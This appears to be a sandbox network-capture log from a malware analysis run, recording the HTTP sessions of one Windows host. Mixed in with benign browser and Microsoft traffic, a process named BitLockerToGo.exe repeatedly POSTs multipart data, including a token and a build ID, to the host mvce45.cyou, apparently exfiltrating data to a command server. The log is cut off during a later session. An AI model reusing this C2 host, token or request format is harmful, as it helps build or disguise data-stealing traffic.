2024-11-21 14:48:19 UTC | 1266 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:19 GMT
                                                                                                                                                                                                                                                                                                                  Pragma: no-cache
                                                                                                                                                                                                                                                                                                                  Expires: -1
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                  Content-Type: text/javascript; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-p6E_XQ0Ag21cXeuUKr9jsg' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
2024-11-21 14:48:19 UTC | 124 | IN
                                                                                                                                                                                                                                                                                                                  Data Ascii: 303)]}'["",["high potential new episodes","final fantasy xiv mobile","spacex starship test flight","magnetic north pole m
2024-11-21 14:48:19 UTC | 654 | IN
                                                                                                                                                                                                                                                                                                                  Data Ascii: oving","eli morgan cubs trade","weather tornado warning","cma awards 2024 winners","wordle hint november 21"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","goog
2024-11-21 14:48:19 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
12 | 192.168.2.8 | 49729 | 172.217.21.36 | 443 | 5904 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:19 UTC | 506 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  X-Client-Data: CIW2yQEIorbJAQipncoBCOj/ygEIk6HLAQiFoM0BCNy9zQEIucrNAQiK080BCMfUzQEIodbNAQio2M0BCPnA1BUYwcvMARi60s0BGMXYzQEY642lFw==
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-11-21 14:48:20 UTC | 1018 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Version: 697903402
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-Prefers-Color-Scheme
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:20 GMT
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
13 | 192.168.2.8 | 49728 | 172.217.21.36 | 443 | 5904 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:19 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Host: www.google.com
                                                                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                  Accept-Language: en-US,en;q=0.9
2024-11-21 14:48:20 UTC | 933 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Version: 697903402
                                                                                                                                                                                                                                                                                                                  Content-Type: application/json; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                  Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
                                                                                                                                                                                                                                                                                                                  Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Form-Factors
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Arch
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Model
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Bitness
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-Full-Version-List
                                                                                                                                                                                                                                                                                                                  Accept-CH: Sec-CH-UA-WoW64
                                                                                                                                                                                                                                                                                                                  Permissions-Policy: unload=()
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename="f.txt"
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:20 GMT
                                                                                                                                                                                                                                                                                                                  Server: gws
                                                                                                                                                                                                                                                                                                                  X-XSS-Protection: 0
                                                                                                                                                                                                                                                                                                                  X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                  Accept-Ranges: none
                                                                                                                                                                                                                                                                                                                  Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
2024-11-21 14:48:20 UTC | 35 | IN | Data Raw: 31 64 0d 0a 29 5d 7d 27 0a 7b 22 75 70 64 61 74 65 22 3a 7b 22 70 72 6f 6d 6f 73 22 3a 7b 7d 7d 7d 0d 0a
Data Ascii: 1d)]}'{"update":{"promos":{}}}
2024-11-21 14:48:20 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
14 | 192.168.2.8 | 49734 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:22 UTC | 318 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----BGCAAFHIEBKJKEBFIEHD
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 505
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-11-21 14:48:22 UTC | 505 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 42 47 43 41 41 46 48 49 45 42 4b 4a 4b 45 42 46 49 45 48 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------BGCAAFHIEBKJKEBFIEHDContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------BGCAAFHIEBKJKEBFIEHDCont
2024-11-21 14:48:24 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:23 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:24 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
15 | 192.168.2.8 | 49738 | 2.16.229.162 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:23 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                  Host: fs.microsoft.com
2024-11-21 14:48:23 UTC | 467 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                  Server: ECAcc (lpl/EF17)
                                                                                                                                                                                                                                                                                                                  X-CID: 11
                                                                                                                                                                                                                                                                                                                  X-Ms-ApiVersion: Distribute 1.2
                                                                                                                                                                                                                                                                                                                  X-Ms-Region: prod-neu-z1
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=179843
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:23 GMT
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  X-CID: 2


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.8 | 49739 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:24 UTC | 320 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----DHJECFCGHIDGHIDHDHIE
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 55081
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-11-21 14:48:24 UTC | 16355 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 44 48 4a 45 43 46 43 47 48 49 44 47 48 49 44 48 44 48 49 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------DHJECFCGHIDGHIDHDHIEContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------DHJECFCGHIDGHIDHDHIECont
2024-11-21 14:48:26 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:25 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
2024-11-21 14:48:26 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.8 | 49741 | 2.16.229.162 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:25 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Accept: */*
                                                                                                                                                                                                                                                                                                                  Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                                  If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                  Range: bytes=0-2147483646
                                                                                                                                                                                                                                                                                                                  User-Agent: Microsoft BITS/7.8
                                                                                                                                                                                                                                                                                                                  Host: fs.microsoft.com
2024-11-21 14:48:25 UTC | 535 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Content-Type: application/octet-stream
                                                                                                                                                                                                                                                                                                                  Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                                                                                                                                                                                                                                  ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                                                                                                                                                                                                                                  ApiVersion: Distribute 1.1
                                                                                                                                                                                                                                                                                                                  Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                                                                                                                                                                                                                                  X-Azure-Ref: 0WwMRYwAAAABe7whxSEuqSJRuLqzPsqCaTE9OMjFFREdFMTcxNQBjZWZjMjU4My1hOWIyLTQ0YTctOTc1NS1iNzZkMTdlMDVmN2Y=
                                                                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=179841
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:25 GMT
                                                                                                                                                                                                                                                                                                                  Content-Length: 55
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  X-CID: 2
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:25 UTC55INData Raw: 7b 22 66 6f 6e 74 53 65 74 55 72 69 22 3a 22 66 6f 6e 74 73 65 74 2d 32 30 31 37 2d 30 34 2e 6a 73 6f 6e 22 2c 22 62 61 73 65 55 72 69 22 3a 22 66 6f 6e 74 73 22 7d
                                                                                                                                                                                                                                                                                                                  Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
18 | 192.168.2.8 | 49742 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:26 UTC | 321 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----EHCAEGDHJKFHJKFIJKJE
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 142457
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:26 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 31 33 66 65 66 66 62 30 31 31 61 37 39 63 34 30 35 33 36 61 61 34 61 37 66 31 32 36 37 65 66 66 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 36 33 35 62 35 63 65 62 38 65 64 30 39 39 35 31 65 62 38 64 35 65 37 37 36 38 31 35 61 64 37 32 0d 0a 2d 2d 2d 2d 2d 2d 45 48 43 41 45 47 44 48 4a 4b 46 48 4a 4b 46 49 4a 4b 4a 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                                  Data Ascii: ------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------EHCAEGDHJKFHJKFIJKJEContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------EHCAEGDHJKFHJKFIJKJECont
2024-11-21 14:48:28 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                  Server: nginx
                                                                                                                                                                                                                                                                                                                  Date: Thu, 21 Nov 2024 14:48:28 GMT
                                                                                                                                                                                                                                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                  Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                                                                  2024-11-21 14:48:28 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                  Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.8 | 49743 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:28 UTC | 318 | OUT | POST / HTTP/1.1
                                                                                                                                                                                                                                                                                                                  Content-Type: multipart/form-data; boundary=----CAKKJKKECFIDGDHIJEGD
                                                                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                                                                                  Host: mvce45.cyou
                                                                                                                                                                                                                                                                                                                  Content-Length: 493
                                                                                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                  Cache-Control: no-cache
2024-11-21 14:48:28 UTC | 493 | OUT | Data Ascii: ------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="token"13feffb011a79c40536aa4a7f1267eff------CAKKJKKECFIDGDHIJEGDContent-Disposition: form-data; name="build_id"635b5ceb8ed09951eb8d5e776815ad72------CAKKJKKECFIDGDHIJEGDCont
2024-11-21 14:48:29 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Nov 2024 14:48:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-11-21 14:48:29 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port
20 | 192.168.2.8 | 49752 | 40.126.53.18 | 443
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:32 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
Connection: Keep-Alive
Content-Type: application/soap+xml
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
Content-Length: 4722
Host: login.live.com
2024-11-21 14:48:32 UTC | 4722 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-11-21 14:48:33 UTC | 569 | IN | HTTP/1.1 200 OK
Cache-Control: no-store, no-cache
Pragma: no-cache
Content-Type: application/soap+xml; charset=utf-8
Expires: Thu, 21 Nov 2024 14:47:33 GMT
P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
Referrer-Policy: strict-origin-when-cross-origin
x-ms-route-info: C516_BAY
x-ms-request-id: a460c9a1-6bca-4b2d-bb40-578268923b59
PPServer: PPV: 30 H: PH1PEPF0001B804 V: 0
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=31536000
X-XSS-Protection: 1; mode=block
Date: Thu, 21 Nov 2024 14:48:32 GMT
Connection: close
Content-Length: 10197
2024-11-21 14:48:33 UTC | 10197 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.8 | 49754 | 94.245.104.56 | 443 | 1464 | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:33 UTC | 428 | OUT | GET /edgeoffer/pb/experiments?appId=edge-extensions&country=CH HTTP/1.1
Host: api.edgeoffer.microsoft.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
Accept-Encoding: gzip, deflate, br
Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-21 14:48:33 UTC | 584 | IN | HTTP/1.1 200 OK
Content-Length: 0
Connection: close
Content-Type: application/x-protobuf; charset=utf-8
Date: Thu, 21 Nov 2024 14:48:32 GMT
Server: Microsoft-IIS/10.0
Set-Cookie: ARRAffinity=3e4931a31fa9f6b0a9a0b3e0bec1ba0e7d81601066244883a4782a099ce2b765;Path=/;HttpOnly;Secure;Domain=api.edgeoffer.microsoft.com
Set-Cookie: ARRAffinitySameSite=3e4931a31fa9f6b0a9a0b3e0bec1ba0e7d81601066244883a4782a099ce2b765;Path=/;HttpOnly;SameSite=None;Secure;Domain=api.edgeoffer.microsoft.com
Request-Context: appId=cid-v1:48af8e22-9427-456d-9a55-67a1e42a1bd9
X-Powered-By: ASP.NET


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.8 | 49757 | 49.13.32.95 | 443 | 7684 | C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-21 14:48:34 UTC | 319 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----EHDGIJJDGCBKFIDHIEBK
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
